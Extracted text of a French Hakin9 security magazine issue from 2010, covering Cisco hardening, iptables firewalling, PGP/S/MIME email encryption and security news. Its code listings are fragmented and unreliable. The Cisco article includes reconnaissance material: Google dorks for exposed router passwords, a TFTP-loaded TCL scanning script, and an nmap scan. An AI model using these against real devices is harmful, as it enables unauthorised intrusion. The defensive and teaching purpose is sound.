Académique Documents
Professionnel Documents
Culture Documents
LE SPCIALISTE DE LA
FORMATION CERTIFIANTE
INFORMATIQUE
ET
MANAGEMENT
EN
www.egilia.com
CONTACTEZ NOS CONSEILLERS FORMATION
DITORIAL
Boutiques online
Publicit : publicite@software.com.pl
(c) 2009 Software Press Sp. z o. o. SK, tous les
droits rservs
Bta-testeurs : Didier Sicchia,
Pierre Louvet, Anthony Marchetti,
Rgis Senet, Paul Amar, Julien Smyczynski,
Gregory Vernon, Latorre Christophe,
Timote Neullas
Les personnes intresses par la coopration
sont invites nous contacter :
fr@hakin9.org
Adresse de correspondance :
Software Press Sp. z o. o. SK
Bokserska 1, 02-682 Varsovie, Pologne
Tl. +48 22 427 32 87, Fax. +48 22 244 24 59
www.hakin9.org
AVERTISSEMENT
Les techniques prsentes dans les articles ne
peuvent tre utilises quau sein des rseaux
internes.
La rdaction du magazine nest pas responsable
de lutilisation incorrecte des techniques
prsentes.
Lutilisation des techniques prsentes peut
provoquer la perte des donnes !
3/2010 HAKIN9
6/2010
DOSSIER
Boutiques online 8
Store Factory
Le nombre de boutiques en ligne augmente chaque
jour. La boutique en ligne est un moyen simple de dmarrer une activit, galement rapide et tendance. Cependant, toute la difficult sera de la rentabiliser et de la
maintenir sur la toile. Cet article vous expliquera comment lancer sa premire boutique online et comment
viter les piges.
PRATIQUE
Scurit CISCO 12
Alaeddine Mesbahi
Cisco propose une varit trs importante de produits et plates-formes. Le nombre de services utiliss et
protocoles implments peut transformer la plate-forme en cible facile, Cisco propose alors plusieurs mcanismes de durcissement. Cet article expliquers les
mcanismes les plus communs pour les scuriser les
plates-formes Cisco.
Scurit Rseaux
Firewall sous Linux 20
Nicolas Hanteville
Maintenant que la plupart des machines sont relies
entre elles dans le monde via Internet, les problmatiques de scurit se font grandissantes. Aprs limpact
des PC-Zombies ou les intrusions via des vers telles
que my-tob ou saccer, la question du pare-feu ne se pose plus. Nous allons voir ensemble le fonctionnement
diptables sous Linux en commenant par les bonnes
pratiques, pour finir sur lascurisation dune machine
connecte Internet.
Robin David
Cet article prsente le fonctionnement du chiffrement
et de la signature des mails. On sintresse donc ici au
chiffrement du contenu des mails et des pices jointes
via lutilisation des deux grandes technologies du domaine, PGP et S/MIME.
ATTAQUE
David Robin
Cet article permettra de sintresser aux diffrentes attaques exploitables sur le protocole DNS dont
deux principales techniques fondes sur le DNS Spoofing, savoir le DNS ID Spoofing et le DNS Cache
Poisoning. Nous nous intresserons ensuite au DNS
Pharming, qui est un driv du Phishing.
FOCUS
Paul Rascagnres
FreeBSD est souvent prsent comme un OS la scurit robuste. Malgr cette rputation un exploit a t
divulgu fin novembre sur la mailing list Full Disclosure par Kingcope. Dans cet article, nous allons tudier
le fonctionnement de cet exploit, le patch propos par
lquipe de mainteneur FreeBSD tout en commenant
par comprendre a quoi sert LD_PRELOAD.
6/2010
ACTUALITS
Google et la confidentialit
Aprs la polmique autour de Google et des informations rcupres la vole , la CNIL a lanc une
tude portant sur la mise en danger des donnes des
usagers.
Lide de base de Google tait denregistrer lidentit
et la position des hotspots Wi-Fi.
Lanalyse a dmontr que le logiciel utilis enregistrait bien plus que des fragments: il enregistrait des
paquets entiers desquels pouvaient tre extraites des
donnes sensibles telles que les adresses mails, mots
de passe etc.
Dautres tats, comme lEspagne ou lAllemagne, ont
aussi demand Google accder aux donnes captures par cette entreprise, mais cest la CNIL qui a t
la premire voir sa requte accepte.
Le lundi 21 juin aura t une journe noire pour Apple, tant donn que son upgrade iOS 4 a permis de
patcher 65 vulnrabilits. La moiti dentre elles taient
critiques daprs les spcialistes.
Certains doutent que le nouvel iPad pourrait tre vulnrable une ou plusieurs des failles patches sur les
iPhones/iPod Touch.
De plus, les utilisateurs diPad nauront pas de patchs
avant cet automne permettant de couvrir certaines vulnrabilits. Un trs gros vecteur dattaques risque donc
dtre ouvert aux pirates.
Ce nombre de vulnrabilits est donc un nouveau record compar aux patchs des 46 failles de lt dernier.
IOS 4 comportait 35 bugs, soit plus de la moiti des
vulnrabilits trouves et qui taient de type : arbitrary code execution, donc critiques.
La prudence est au rendez-vous pour tous les utilisateurs de produits Apple tels que liPad.
Une vague de censure en Turquie est arrive il y a quelques temps, bloquant de nombreux services de Google tels que : Google Traduction, Google Documents
ou encore Google Livres. Il sagit l dune consquence
de la volont des Fournisseurs daccs internet Turques de bloquer certaines adresses IP affilies Youtube.
De nombreuses autres adresses IP relatives Youtube et aux services de Google ont t blacklistes. Progressivement, de nombreux internautes se sont plaints que de nombreux services tels que Picasa, Google
Maps ne fonctionnaient plus.
Ds lors, une attaque DdoS denvergure a t lance
contre le ministre du transport, lAutorit des technologies de linformation et des communications et contre
la prsidence des tlcommunications.
Ces trois sites web ont t inaccessibles une bonne
partie de la journe cause dun groupe dhacktivistes,
mcontents de cette censure. Daprs de nombreuses
sources, lattaque aurait dur 10 heures.
Au cours de la premire Telecomix Cyphernetics Assembly qui a eu lieu en Sude, une vulnrabilit au
sein des VPNs a t prsente. Le fait de combiner Ipv6
(qui remplace progressivement Ipv4) ainsi que PPTP
(point-to-point tunneling protocol) permettent de retrouver des informations comme par exemple ladresse IP,
ladresse MAC ou encore le nom de lordinateur dun
utilisateur en particulier.
Cette information est donc des plus critiques puisque lune des utilisations des VPN consiste favoriser lanonymat et ainsi assurer la confidentialit de ses
donnes personnelles.
De nombreuses alternatives ont t dcrites comme,
par exemple, le fait de repasser IPv4 ou de favoriser
lutilisation dOpenVPN plutt que PPTP.
<<NUMER_WYDANIA>>
ACTUALITS
Absolute Manage,
une vraie catastrophe
Norton DNS est, comme son nom lindique, un service de DNS public, permettant de scuriser tout appareil
connect sur la toile.
Il comporte une blacklist avec tous les sites ayant une
activit plus ou moins accrue avec les malwares, phis-
Metasploitable,
une vraie russite pour chacun
Tout le monde a trs certainement entendu parl de Metasploit, qui est un framework utilis par de nombreuses
compagnies afin de raliser des tests dintrusion sur des
technologies cibles. La base de donnes dexploits, outils en tout genre est colossale et est un outil part entire
dans laudit de scurit. Metasploitable est donc une
image Vmware qui nest autre quune version dUbuntu
8.04 comportant des services faillibles. Le but du jeu est
donc de monter limage sur son ordinateur et ainsi, de
sentrainer afin dutiliser le framework Metasploitable.
Cest donc un bon entranement pour comprendre le
fonctionnement du framework mais aussi avoir une ide
de ce quest le pentesting, tout en ne nuisant pas aux
infrastructures informatiques existantes.
<<STRONA_PISMA>>
Dossier
Boutiques online
Store Factory
Le nombre de boutiques en ligne augmente chaque jour. A
travers cet article, vous allez apprendre comment lancer sa
boutique online.
Le E-commerce comporte les mmes avantages quinternet, cest--dire laccs un large public, la rapidit dexcution, laccs 24h/24 7j/7 Mais en plus,
il permet de gnrer une activit et des revenus. Facile daccs, avoir une boutique en ligne permet de dvelopper ses ventes avec un investissement matris
et sans les droits dentre dune boutique physique.
Lhbergement, considr comme le loyer, est accessible tous sans garantie demande. De nombreuses options sont disponibles pour mettre en place son
e-commerce, payantes ou gratuites. Des solutions de
paiement en ligne permettent de gnrer des ventes
sans papier et des cots minimes. Bref, le e-commerce ressemble une formidable opportunit ouverte chacun.
Cependant, si la plus grande qualit du e-commerce
est son accessibilit, cest aussi ce qui cre son plus
grand dfaut. Labondance de boutiques en ligne fait
dinternet le march le plus concurrentiel. Alors que
pour une boutique physique, le choix de lemplacement
est dcid une fois pour toutes, sur la toile, la place de
la boutique change en permanence. Personne na de
place assure.
Avoir bien rflchi son offre commerciale: une boutique en ligne est avant tout un commerce. Mme si In
6/2010
Boutiques online
Dossier
Conclusion
A propos de lauteur
Store-Factory propose une offre professionnelle complte : site professionnel, outils dadministration complets et volutifs,
rfrencement optimis, outils marketing, formation et support tlphonique illimit. Les sites Store-Factory bnficient
dune charte graphique cre sur mesure.
hakin9.org/fr
11
Pratique
Scurit CISCO
Alaeddine Mesbahi
Cisco propose une varit trs importante de produits et plates-formes,
elle est principalement connue pour ses routeurs et commutateurs trs
performants. Le nombre de services utiliss et protocoles implments
peut transformer la plate-forme en cible facile, Cisco propose
cependant plusieurs mcanismes de durcissement. Cet article se
consacre aux principaux vecteurs d'attaques contre ces plates-formes et
propose les mcanismes les plus communs pour les scuriser.
Cet article explique...
Scurit CISCO
Architecture Software
utilis, l'IOS utilise massivement de la mmoire partage accessible par tous les processeurs.
La mmoire est subdivise en rgion aux fonctionnements diffrents :
Approche offensive
: 0
: 256 Mb
IOMEM size : 0 Mb
: npe-400
IOS image
: c7200-jk9s-mz.124-18c.bin
Midplane
: vxr
################################################ [OK]
hakin9.org/fr
13
Pratique
Dcouverte et numration
La mthode la plus simple et la plus directe pour exploiter n'importe quelle plate-forme consiste trouver
des services de gestion, exemple du Telnet ou SSH,
14
Oprateur
Description
Exemple
site
URPF site:www.cisco.com
filetype
inurl
related
Related:www.securityfocus.com
intext
Intext:enable password 7
cache
cache:www.security-database.com
intitle
6/2010
Scurit CISCO
Phenoelit (http://www.phenoelit.de)
Approche dfensive
Dsactivation des services inutiliss : le durcissement du Management Plane commence par la dsactivation de tous les services inutiliss qui sont parfois
vulnrables ou grand consommateurs de ressources,
donc vecteurs d'attaques de dnis de service (cf. Listing 7).
Voici une liste assez complte des principaux services dsactiver :
PAD
MOP
Finger
Bootp
DNS
Services TCP et UDP (Echo, Chargen, Discard)
Script TCL
CDP et LLDP sur les interfaces externes
Scanning ...
#AS 00010
10.0.0.0
(50000,1111111,1476,255,1,0)
IRDP
192.168.1.10 (1800,0)
192.168.9.99 (1800,0)
RIPv1
10.0.0.0 (1)
Autonomous systems 0 to 15
Router>en
in ACTIVE mode
Router(tcl)#source tftp://tftpserver/tclsh.tcl
delay is 1
Router#tclsh
192.168.1.10 is alive
hakin9.org/fr
15
Pratique
Connected to router.
-------------------------------------
ADVENTERPRISEK9-M), Version
SOFTWARE (fc1)
12.4(17), RELEASE
Building configuration...
version 12.4(17)
close $sh
no service tcp-small-servers
no service udp-small-servers
no ip bootp server
no ip finger
no service dhcp
no ip domain lookup
no service pad
no ip http server
logging <address>
no logging monitor
no logging console
logging source-interface loopback 0
} else {
16
access-class 140 in
!
6/2010
Pratique
fort, type MD5, et non des mots de passe de type 7 facilement dchiffrables.
Il est galement important de configurer un timeout de
connexion, entre 5 et 10 minutes (cf. Listing 8).
Journalisation et sauvegarde des actions : la journalisation des vnements ainsi que la sauvegarde des
fichiers de configuration dpendent de la politique interne de l'entreprise, elle-mme dpendant de sa capacit
stocker et inspecter les logs gnrs (cf. Listing 9).
Une configuration scurise commence par la dfinition d'une interface source des log (souvent l'interface
loopback0), l'activation des timestamps (facilite la lecture des logs) et la dfinition d'un niveau des logs envoyer (en fonction de la capacit de stockage, proscrire le niveau 7).
Il est prconis de dsactiver les logs console et logs
monitor susceptibles de consommer normment de
ressources, causant un dni de service.
Filtrage d'accs aux services de contrle : il existe deux
mthodes de gestion d'une plate-forme (routeur, commutateur, serveur ), Inbound, le flux de transport et le flux
de contrle sont sur les mmes interfaces ou Outbound,
sparation des flux de contrle et des flux de transport.
Le modle outbound est plus scuris, son application se traduit par l'installation de serveurs de rebond,
souvent accessible travers un VPN. Des access-list
sont crs sur le routeur n'autorisant l'accs qu' partir
de la machine de rebond. Il est galement possible de
dfinir une interface ddie aux protocoles de gestion,
permettant ainsi une scurit optimale.
L'IOS Cisco permet galement d'appliquer des access-list sur les accs SNMP en lecture seule et en lecture criture, n'autorisant que les machines de confiance, censes accder en SNMP la plate-forme (cf.
Listing 10).
18
Scope
Description
0.0.0.0/8
Ce rseau
10.0.0./8
127.0.0.0/
Loopback
169.254.0.0/16
Lien local
172.16.0.0/12
192.0.2.0/24
Rseau de test
192.88.99.0/24
192.168.0.0/16
198.18.0.0/15
224.0.0.0/4
Multicast
6/2010
terminologie
AS (Autonomous System) : un ensemble de rseaux IP sous le contrle d'une seule et mme entit, typiquement
un fournisseur d'accs Internet ou une plus grande organisation qui possde des connexions redondantes avec
le reste du rseau Internet. Wikipdia
Looking glass : serveurs accessibles partir d'internet pour visionner des informations sur le routage et des statistiques sur le trafic.
AAA : correspond un protocole qui ralise trois fonctions
: l'authentification, l'autorisation, et la traabilit (en Anglais:Authentication, Authorization, Accounting/Auditing).
Wikipdia
Sur internet
Bloques IP du RFC3330
Messages ICMP
Paquets fragments.
Conclusion
PrOPOS De L'auteur
L'auteur est tudiant en troisime anne Telecom SudParis
(ex Telecom INT), il effectue actuellement un stage d'une anne Bouygues Telecom en scurit rseau. Vous pouvez le
contacter l'adresse mail suivante alaeddine.mesbahi@gmail.
com.
hakin9.org/fr
19
Scurit rseaux
ans le noyau 2.2 avec ipchains, le code du parefeu tait parpill au travers de la couche applicative rseau, ce qui ne facilitait pas la maintenance.
Depuis les noyaux 2.4, la solution de filtrage Netfilter
est intgre au noyau des distributions, ce qui permet de
meilleures performances et une grande facilit d'utilisation.
Cette solution permet une analyse au niveau TCP/IP
et la gestion d'IPV4, IPV6, IPX, ARP (et bien d'autre),
d'effectuer du filtrage, la translation d'adresse (NAT) ainsi que l'altration de paquet (MANGLE). Par Netfilter on
dsigne l'ensemble des fonctions internes du noyau qui
ralisent les oprations de filtrage/firewall. Iptables sert
d'interface de configuration, il fonctionne en mode utilisateur. L'arrive du mode StateFull a apport un grand
confort d'utilisation : plus de filtrage brut, on met en place
un systme de filtrage intelligent.
Fonctionnement de Netfilter
Le but d'un pare-feu est de bloquer, filtrer, router, modifier des paquets rseaux. Les rgles de configuration
de Netfilter (iptables) ont t cres pour tre simple
d'utilisation, mme si l'on verra que l'on peut trs bien
crer des rgles trs longues et trs compliques. Pour
ce faire des points d'encrages (hook) ont t mis en place, leur rle est de permettre une gestion des paquets
chacun des points d'exploitation (voir Figure 1) :
20
NF _ IP _ PRE _ ROUTING
ce.
NF _ IP _ LOCAL _ IN
NF _ IP _ FORWARD
NF _ IP _ POST _ ROUTING
locale.
: paquets router.
: paquets mis depuis la machine
NF _ IP _ LOCAL _ OUT
locale.
: PREROUTING,
: INPUT,
NF _ IP _ FORWARD : FORWARD,
NF _ IP _ LOCAL _ OUT : OUTPUT,
NF _ IP _ POST _ ROUTING : POSTROUTING.
NF _ IP _ PRE _ ROUTING
NF _ IP _ LOCAL _ IN
Le traitement des paquets est effectu de manire squentielle, c'est dire, dans l'ordre dans lesquelles les
rgles ont t appliques (d'o l'importance de bien
tout faire dans l'ordre). Le paquet sera trait de la manire suivante par le noyau :
Reconnaissance de la Table (on traite le paquet
en fonction des rgles de la table) : FILTER, NAT,
MANGLE,
Reconnaissance pour aiguillage (type de paquet :
INPUT, OUTPUT...),
6/2010
Firewall
Test de la validit du paquet par rapport la premire rgle, si le paquet correspond une autorisation il passe (chaine ACCEPT), s'il correspond
une interdiction, il est supprim (chaine DROP) sinon il passe la rgle suivante...,
Le paquet travers toutes les rgles car aucune
ne lui correspondait, le paquet est donc trait par la
politique par dfaut (ACCEPT ou DROP).
Avant de commencer la rdaction de rgles il est important de ne pas tomber dans la crdulit et dire : j'ai un
pare-feu je suis protg !
Un pare-feu c'est comme avec un parapluie, s'il est
cass, qu'il y a trop de vent ou que je ne l'ouvre pas il
ne protge pas de la pluie.
Au lieu donc de faire n'importe quoi et de partir dans
des lucubrations qui donneront des rgles incohrentes, qui laisseront passer ce qui doit tre filtr et qui filtrera ce qui doit passer, il faut faire une liste des besoins !
Dans cet article nous allons partir sur un cas trs simple : j'ai une machine en frontale sur internet avec une
seule carte rseau, je veux limiter au maximum les possibilits d'y accder tout en me permettant de l'exploiter.
Bien sr quelques modifications simples permettront
d'adapter ce cas au votre (sans entrer dans des architectures trop complexes, voir Figure 3).
Tout d'abord nous allons noncer nos besoins primaires :
Figure 2. Chaines
hakin9.org/fr
21
Scurit rSeaux
Le port source.
L'adressage de destination (o va le flux).
Le port destination.
(Appel de la commande)
table (si aucune n'est prcise c'est la table
FILTER), exemple (ici -t FILTER) : iptables -t FILTER -P
iptables
iptables
INPUT DROP
(ici -P
INPUT)
La table FiLter
Figure 3. Scnario 1
La table Nat
Elle gre la transaction d'adresse et de port, elle permet de transformer notre pare-feu en routeur. Elle permet l'utilisation des chanes suivantes : PREROUTING,
POSTROUTING, OUTPUT. Cette table n'est pas utilise dans le cadre de l'IPV6.
La table MaNGLe
La table raW
22
formations
forma
tions
& Certification professionnelle
Plus de 350 formations agres par les diteurs et constructeurs et 4000 sessions dlivres
par an font de Global Knowledge un organisme de formation rfrent en informatique,
en management des Systmes dInformation et gestion de projets IT.
Global Knowledge a t lu Meilleur partenaire Formation de lanne par Cisco, VMware et Citrix!
Les Essentiels Rseaux, Virtualisation, Voix, Scurit
Client/Serveur/Messagerie Microsoft
Installation et configuration du client Windows 7
Planifier les dploiements et administrer les environnements Windows 7
Configuration et administration de SharePoint Server 2010 nouveau
Dvelopper et personnaliser les applications pour Sharepoint 2010 nouveau
Lessentiel de ladministration de serveurs Windows 2008
Configurer et dpanner une infrastructure rseau Windows 2008
Active Directory pour Windows Server 2008
Configuration, administration et dpannage de Exchange Server 2010
Concevoir et dployer des solutions de messagerie avec Exchange 2010 nouveau
Mise en uvre et maintenance des outils de communications unifies avec OCS R2
Rentre 2010 :
les incontournables
Rseaux Cisco
Interconnecting Cisco Network Devices Part 1 (ICND1)
Implementing Cisco IP Routing (ROUTE) nouveau
Implementing Cisco IP Switched Networks (SWITCH) nouveau
Troubleshooting & Maintaining Cisco IP Networks (TSHOOT) nouveau
Configurer BGP sur des routeurs Cisco (BGP)
Cisco IPV6 Concepts, Design et Dploiement (IPV6)
Implementing Cisco MPLS (MPLS)
Mettre en oeuvre une infrastructure Cisco MultiCast (ICMI) nouveau
Mettre en oeuvre CiscoWorks LMS (CWLMS)
Mettre en oeuvre la scurit des rseaux IOS Cisco (IINS)
Scuriser les rseaux avec des routeurs et switches Cisco (SNRS)
Les fondamentaux de la scurit des rseaux avec Cisco ASA (SNAF)
Cisco Wireless Lan Fundamentals (CWLF)
Mettre en oeuvre Cisco IOS Unified Communications (IIUC)
Cisco : La Voix sur IP version 6.0 (CVOICEV6)
Mettre en oeuvre la Qos Cisco (QOS)
Cisco IP Telephony Part 1 version 6 (CIPT1V6)
Data Center Network Infrastructure (DCNI-1)
Formations ligibles au DIF | Support de cours remis chaque participant
www.globalknowledge.fr
Global Knowledge France - Sige social - Tour Albert 1er - 65, avenue de Colmar - 92507 Rueil-Malmaison cedex - Tl.: 01 78 15 34 00 - Fax : 01 78 15 33 90 2010 Global Knowledge Training LLC.
Scurit rseaux
iptables -L -n -v --line
Sauvegarde du fichier de configuration : (ne fonctionne pas sous DEBIAN, il faut crer un script et le placer
dans /etc/network/if _ preup.d/)
iptables save
Nous pouvons maintenant commencer mettre en place nos rgles, je tiens prciser que chacune des rgles
que je vais implmenter sera indpendante des autres,
afin de garder une cohrence globale en cas de besoin
de suppression, certaines pratiques que je ne recommande pas sont d'implmenter sur les trois chaines principales
(INPUT, OUTPUT et FORWARD) un suivi de connexion
globale, afin de faciliter la cration des rgles (je n'ai plus
me soucier du retour, je cre simplement la rgle d'initiation de la connexion). Cette manire de faire simpliste peut
engendrer des trous bants dans le pare-feu, je vous recommande donc d'viter ce genre de pratique.
Nous allons maintenant autoriser le LOOPBACK : (le
rseau local de la machine)
iptables -A INPUT -i lo -j ACCEPT
Autorisation du PING :
iptables -A OUTPUT -m state --state NEW,ESTABLISHED -p
ICMP -s 192.168.0.2 -j ACCEPT
24
6/2010
Firewall
-j ACCEPT
ACCEPT
Description
Entre /
Sortie
tat
Protocole
IP source
Port source
IP destination
Port destination
PING
OUTPUT
NEW, ESTABLISHED
ICMP
192.168.0.2
(aucun)
0.0.0.0
(aucun)
PING
INPUT
ESTABLISHED
ICMP
0.0.0.0
(aucun)
192.168.0.2
(aucun)
DNS
OUTPUT
NEW, ESTABLISHED
UDP
192.168.0.2
>1024
0.0.0.0
53
DNS
INPUT
ESTABLISHED
UDP
0.0.0.0
53
192.168.0.2
>1024
HTTP
OUTPUT
NEW, ESTABLISHED
TCP
192.168.0.2
>1024
0.0.0.0
80
HTTP
INPUT
ESTABLISHED
TCP
0.0.0.0
80
192.168.0.2
>1024
HTTPS
OUTPUT
NEW, ESTABLISHED
TCP
192.168.0.2
>1024
0.0.0.0
443
HTTPS
INPUT
ESTABLISHED
TCP
0.0.0.0
443
192.168.0.2
>1024
SMTP
OUTPUT
NEW, ESTABLISHED
TCP
192.168.0.2
>1024
0.0.0.0
25
SMTP
INPUT
ESTABLISHED
TCP
0.0.0.0
25
192.168.0.2
>1024
POP3
OUTPUT
NEW, ESTABLISHED
TCP
192.168.0.2
>1024
0.0.0.0
110
POP3
INPUT
ESTABLISHED
TCP
0.0.0.0
110
192.168.0.2
>1024
IMAP
OUTPUT
NEW, ESTABLISHED
TCP
192.168.0.2
>1024
0.0.0.0
143
IMAP
INPUT
ESTABLISHED
TCP
0.0.0.0
143
192.168.0.2
>1024
FTP
OUTPUT
NEW, ESTABLISHED
TCP
192.168.0.2
>1024
0.0.0.0
21
FTP
INPUT
ESTABLISHED
TCP
0.0.0.0
21
192.168.0.2
>1024
FTP (actif)
INPUT
RELATED, ESTABLISHED
TCP
0.0.0.0
20
192.168.0.2
>1024
FTP (actif)
OUTPUT
ESTABLISHED
TCP
192.168.0.2
>1024
0.0.0.0
20
FTP (passif)
INPUT
RELATED, ESTABLISHED
TCP
192.168.0.2
>1024
0.0.0.0
>1024
FTP (passif)
OUTPUT
ESTABLISHED
TCP
0.0.0.0
>1024
192.168.0.2
>1024
hakin9.org/fr
25
Scurit rseaux
On remarque ici que les rgles se ressemblent beaucoup, avec iptables, une fois les quelques rgles standard effectues c'est assez simple d'utilisation.
Si on essaie cette commande, normalement aucun rsultat ne devrais tre reu : nmap effectue un PING
sur la cible avant de commencer le scan, et l'ICMP
est ici filtr. Nous avons donc bien vrifi que l'ICMP
tait bloqu. Pour spcifier nmap de ne pas effectuer
de PING il suffit d'ajouter l'option -P0 :
nmap -P0 -sS 192.168.0.2 -p-
Utilisation du NAT
La redirection de flux est trs intressante et trs puissante, vous pouvez facilement transformer la machine
6/2010
Firewall
l'utilisation est quasiment identique, la diffrence est visible pour seulement quelques protocoles. On peut aussi simplifier l'criture, par exemple lors de l'utilisation de
l'adresse 1234:0:0:0:0:0:0:2 je peut l'crire 1234::2.
Afficher la liste des rgles de filtrages en numrotant
les lignes en indiquant le nombre de paquets traits,
sans faire de rsolution de port :
ip6tables -L -n -v --line
Pour supprimer une rgle grce son numro de ligne :
sysctl -w net.ipv4.ip_forward=1
to-destination 192.168.0.2
Faciliter la journalisation
-j LOG --log-prex "CONNEXION AU TELNET : " -log-level "warn" -m limit --limit 1/m
et iPV6 ?
Dnition
hakin9.org/fr
autres solutions
PrOPOS De L'auteur
Autodidacte depuis plus de dix ans dans le domaine du dveloppement et l'administration, l'auteur effectue des audits
de scurit informatique pour le compte d'un grand groupe
franais.
Mail : hanteville.nicolas@free.fr
27
Scurit rseaux
PGP
PGP est un systme de chiffrement labor par Philip Zimmermann en 1991. Il n'a pas t conu dans le
but unique de chiffrer des mails mais dans un but plus
gnral de chiffrement de documents. C'est pour cette
raison qu'il a parfois du mal s'adapter au formatage
d'un mail. Ce systme a t normalis par L'IETF, dont
OpenPGP est le standard. Les deux grandes implmentations de OpenPGP sont PGP de la PGP Corporation et GnuPG sous licence GPL. Par la suite, nous
n'utiliserons que GnuPG(ou GPG) car il est libre. Il
n'en reste pas moins compatible avec l'implmentation de la PGP Corp.
Caractristiques techniques
D'un point de vue technique, GPG utilise DSA et Elgamal comme algorithme de chiffrement asymtrique par
dfaut. Il est maintenant possible d'utiliser RSA car celui-ci n'est plus brevet. Il diffre sur le principe car RSA
est bas sur la difficult de factoriser des grands nombres en nombres premiers, alors que DSA et Elgamal
sont fonds sur la difficult de rsoudre les logarithme
discrets. En terme de chiffrement symtrique, GPG propose notamment le 3DES et l'AES; ce qui lui vaut l'appellation de cryptographie ou cryptosystme hybride,
car mlant cryptographie symtrique et asymtrique
6/2010
(voir encadr et Figure 1). La fonction de hachage utilise par dfaut est le SHA-1.
Le standard OpenPGP a l'avantage de permettre
une grande modularit dans le contenu de la cl il
est en effet possible d'ajouter plusieurs UID au sein
d'une mme cl, donc d'ajouter plusieurs adresses
mail ce qui vite de multiplier le nombre de cls. Il
est aussi possible d'ajouter des sous-cls, une photo,
changer le mot de passe de la cl prive, changer la
date d'expiration ou encore modifier les prfrences
de la cl en terme de chiffrement, hachage, compression...
La diffusion des cls publiques se fait par l'intermdiaire de serveurs de cls PGP publiques. Ainsi,
Wot?
Comme dans tout systme d'change sur le net, se pose alors la question de la confiance que l'on accorde
l'interlocuteur. A l'inverse d'un systme architectur
autour d'un PKI, pour PGP la confiance se gre de personne personne, systme aussi connu sous le nom
de Web Of Trust . Le Web Of Trust est un concept invent en mme temps que PGP dans le but d'tablir un
niveau de confiance entre les personnes utilisant PGP
(voir Figure 2). Il suit un modle dcentralis et son m-
Signature:
1.
2.
3.
4.
Dchiffrement:
1. Alice dchiffre la cl de session avec sa cl prive,
2. Elle dchiffre le message avec la cl de session,
Vrification signature:
1. Elle dchiffre la signature avec la cl public de Bob, 11' Elle obtient le hash que Bob avait fait du corps du message
2. Alice hash le message dchiffr prcdemment,
3. Si les condensas (hash) sont identiques alors la signature est valide.
hakin9.org/fr
29
Scurit rSeaux
On a sign la cl de quelqu'un directement ou indirectement (si on configur notre cl avec un niveau de confiance maximum, ce qui parait normal),
Notre cl et la cl du destinataire est sign par une
3me personne(tiers) laquelle on a accord le niveau de confiance maximum,
Par raction en chane on accord notre confiance la personne en accordant le niveau de confiance maximum une personne qui l'a sign).
Note:Dans gpg on peut configurer le trust-model,
par dfaut c'est le Web Of Trust ci-dessus, mais
il en existe d'autres tels que le direct ou la validit
d'une cl n'est pas calcule avec le Web Of Trust
mais dfinie par l'utilisateur, ou encore le always qui
ne tient pas compte du Web Of Trust. Ainsi, si la signature est bonne la cl est de confiance sinon elle
ne l'est pas.
avec une adresse mail qu'il ne possde pas et l'envoyer sur un serveur de cl publique. Ce phnomne d'usurpation d'identit est le principal risque, car
un mail chiffr avec une cl usurpe sera lisible par
l'usurpateur en supposant qu'il ait accs la boite
aux lettres lectronique ou qu'il soit apte intercepter les mails en amont. Dans ce cas l rien n'empche l'usurpateur de dchiffrer le mail, le chiffrer
nouveau avec la bonne cl et de le renvoyer la
bonne personne ce qui fait finalement penser du
man in the middle. Cependant, en pratique la mise
en place de ce genre d'attaque doit tre trs complexe.
Le deuxime inconvnient de PGP est l'absence
de mthode pro-active pour vrifier la validit d'une
cl. Par exemple, lorsque l'on rvoque notre cl et
qu'on l'envoie sur un serveur de cl, celle-ci est rvoque. Cependant, si nos correspondant ne procdent
pas vrification manuelle(gpg --refresh-keys) de l'tat
de la cl, alors ils continuerons utiliser une cl qui
est normalement rvoque. Cependant, rien ne nous
empche de mettre cette commande dans un crontab ou automatiser la mise jour d'une quelconque
manire.
La meilleure solution contre ces problmes reste la
communication avec les correspondants y compris lors
de la prise de contact pour qu'il vous transmette l'ID de
sa cl ou son fingerprint.
30
6/2010
Scurit rseaux
GnuPG en pratique
suite vous pouvez agrandir la taille de la cl si elle ne vous convient pas. Ne vous inquitez pas
s'il vous est demand d'agiter la souris et d'appuyer sur les touches de votre clavier. Il a besoin
au moins au dbut de gnrer des nombres alatoires pour la cration de la cl. Ceci fait votre paire de cls, alors elles se trouvent dans votre trousseau de cls dans votre homedir. Les commandes
de bases sont:
gpg list-key et gpg --list-secret-key qui liste respectivement toutes les cls publiques et toutes les cls prives du trousseau de cls (keyring).
gpg list-sigs permet de lister toutes les signatures
des cls ou de la cl spcifie
gpg export monuid permet d'exporter la paire de cls
spcifie(par dfaut sur la sortie standard)
gpg edit-key monuid permet d'diter la cl identifie par
monuid.
Une fois le prompt affich tapez help et de nombreuses options s'offrent vous, sachant qu'il faudra entrer
le mot de passe de la cl prive pour les oprations touchant directement la cl.
Se pose alors la question, comment on tlcharge les
cls de nos correspondants et comment met-on disposition notre cl publique? La mthode standard est
d'utiliser un serveur de cl qui s'occupera de rpliquer
cette cl sur d'autre serveurs.
Pour tlcharger une cl si l'on connat dj l'identifiant de la cl on peut utiliser
gpg keyserver pgp.mit.edu recv-keys [uid] pour la tlcharger. On peut cependant la tlcharger du serveur
que l'on veut.
32
6/2010
dans les webmails. Il s'appelle FireGPG mais n'est malheureusement plus support depuis le 7 Juin 2010.
Nous allons donc nous intresser au plugin Enigmail
qui est de loin le plus volu et qui permet une administration complte de GnuPG.
Lors du premier lancement de Thunderbird avec Enigmail, l'assistant propose de crer un couple de cls, si
on la possde dj il suffit d'ignorer l'assistant. Deux
menus sont importants OpenPGP/Gestion des Clefs
qui permet d'importer une cl, chercher une cl sur un
serveur signer une cl, afficher les proprits d'une cl
ou encore de modifier son niveau de confiance (voir Figure 3).
Le deuxime lment important est la configuration
qu'il vaut mieux viter de bidouiller sans connatre, cependant une option est trs intressante activer. Cette option se trouve dans OpenPGP/Prfrences, onglet
Serveur de clefs aprs avoir cliqu sur le mode expert,
c'est l'option de tlchargement automatique des clefs
lors de la rception d'un message sign dont on ne possde pas la cl publique (voir Figure 4).
La dernire tape avant de pouvoir signer des
mails est d'associer une cl, un compte, pour cela,
il faut aller dans les proprits du compte (account
settings), activer OpenPGP pour ce compte et choisir la bonne cl (ou laisser le choix automatique par
l'adresse mail).
hakin9.org/fr
33
Scurit rSeaux
S/MiMe
S/MIME pour secure MIME est une extension du standard MIME, pour y inclure la signature numrique encapsule au format MIME. Il est donc plus particulirement
conu pour la signature et le chiffrement des mails. Les
certificats S/MIME ou certificats personnels(voir chapitre suivant), sont des certificats fonds sur les certificats x509. Le x509 est un format standard de certificat
lectronique, il introduit certains concepts comme les
listes de rvocations. Comme tout certificat x509, les
certificats S/MIME s'articulent autour d'une autorit de
